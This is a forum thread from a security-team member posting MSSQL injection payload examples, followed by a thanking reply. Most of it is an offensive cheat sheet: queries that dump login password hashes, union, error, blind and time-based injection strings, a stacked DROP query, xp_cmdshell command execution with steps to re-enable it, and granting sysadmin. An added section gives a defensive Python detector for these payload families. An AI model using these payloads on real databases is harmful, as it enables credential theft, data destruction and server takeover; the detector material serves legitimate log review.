Topic: MsSQL Injection Payload Examples
KingSkrupellos
Comment: #1
MsSQL Injection Payload Examples
10.02.2019 14:35
MsSQL Injection Payload Examples
********************************

Author => KingSkrupellos
Team => Cyberizm Digital Security Team

# MSSQL Injection

## MSSQL comments

Code:
```sql
-- comment goes here
/* comment goes here */
```

## MSSQL version

Code:
```sql
SELECT @@version
```

## MSSQL database name

Code:
```sql
SELECT DB_NAME()
```

## MSSQL List Databases

Code:
```sql
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, …
```

## MSSQL List Column

Code:
```sql
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

SELECT table_catalog, column_name FROM information_schema.columns
```

## MSSQL List Tables

Code:
```sql
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable

SELECT table_catalog, table_name FROM information_schema.columns
```

## MSSQL User Password

Code:
```sql
-- MSSQL 2000:
SELECT name, password FROM master..sysxlogins
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.

-- MSSQL 2005:
SELECT name, password_hash FROM master.sys.sql_logins
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
```

## MSSQL Union Based

Code:
```sql
-- extract database names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb

-- extract tables from Injection database
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
[*] Profiles
[*] Roles
[*] Users

-- extract columns for the table Users
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName

-- Finally extract the data
$ SELECT UserId, UserName from Users
```

## MSSQL Error based

Code:
```sql
For integer inputs : convert(int,@@version)
For integer inputs : cast((SELECT @@version) as int)

For string inputs   : ' + convert(int,@@version) + '
For string inputs   : ' + cast((SELECT @@version) as int) + '
```

## MSSQL Blind based

Code:
```sql
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'

WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
```

## MSSQL Time based

Code:
```sql
ProductID=1;waitfor delay '0:0:10'--
ProductID=1);waitfor delay '0:0:10'--
ProductID=1';waitfor delay '0:0:10'--
ProductID=1');waitfor delay '0:0:10'--
ProductID=1));waitfor delay '0:0:10'--

IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'                              comment:   --
```

## MSSQL Stacked Query

Code:
Use a semi-colon ";" to add another query

```sql
ProductID=1; DROP members--
```

## MSSQL Command execution

Code:
```sql
EXEC xp_cmdshell "net user";
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:';
EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1';
```

If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005)

Code:
```sql
EXEC sp_configure 'show advanced options',1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;
RECONFIGURE;
```

## MSSQL Make user DBA (DB admin)

Code:
```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';
```
_________________________________________________________

##### THE END #######

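For the defensive side of the payload families listed in the post above, the following added example (not part of the original thread) triages URL-encoded query strings from a web access log against one signature per family. The names `SIGNATURES`, `normalize`, `classify` and the sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One signature per payload family in the post above (matched after normalisation).
SIGNATURES = {
    "time_based": re.compile(r"\bwaitfor\s+delay\b"),
    "stacked_query": re.compile(r";\s*(drop|exec|waitfor)\b"),
    "command_exec": re.compile(r"\bxp_cmdshell\b"),
    "server_config": re.compile(r"\bsp_(configure|addsrvrolemember)\b"),
    "error_based": re.compile(r"(convert\s*\(\s*int\s*,|cast\s*\().{0,80}@@version"),
    "catalog_enum": re.compile(
        r"\b(sysdatabases|sysobjects|syscolumns|sysxlogins|sql_logins|information_schema)\b"),
}

def normalize(value: str) -> str:
    """URL-decode, treat /* */ comments as whitespace, collapse spaces, lower-case."""
    value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).lower()

def classify(raw_query: str) -> dict:
    """Map each parameter name to the sorted signature classes its value matches."""
    findings = {}
    for pair in raw_query.split("&"):
        name, _, value = pair.partition("=")
        text = normalize(value)
        hits = sorted(k for k, rx in SIGNATURES.items() if rx.search(text))
        if hits:
            findings[name] = hits
    return findings

# Constructed query strings, as they would appear URL-encoded in a web access log.
SAMPLE_QUERIES = [
    "ProductID=1",
    "ProductID=1%27%3Bwaitfor%20delay%20%270%3A0%3A10%27--",
    "ProductID=1%3B%20EXEC%20master.dbo.xp_cmdshell%20%27ping%20127.0.0.1%27",
    "id=%27%20%2B%20convert(int%2C%40%40version)%20%2B%20%27",
    "name=O%27Brien&note=please+update+my+order",  # benign: quote and keyword, no match
]

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(classify(q) or "clean", "<-", q)
```

Signature hits are a triage signal for log review; parameterised queries and a least-privilege database login are what remove the injection itself.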
#Ayar
Comment: #2
RE: MsSQL Injection Payload Examples
11.02.2019 11:42
Thanks, great work.
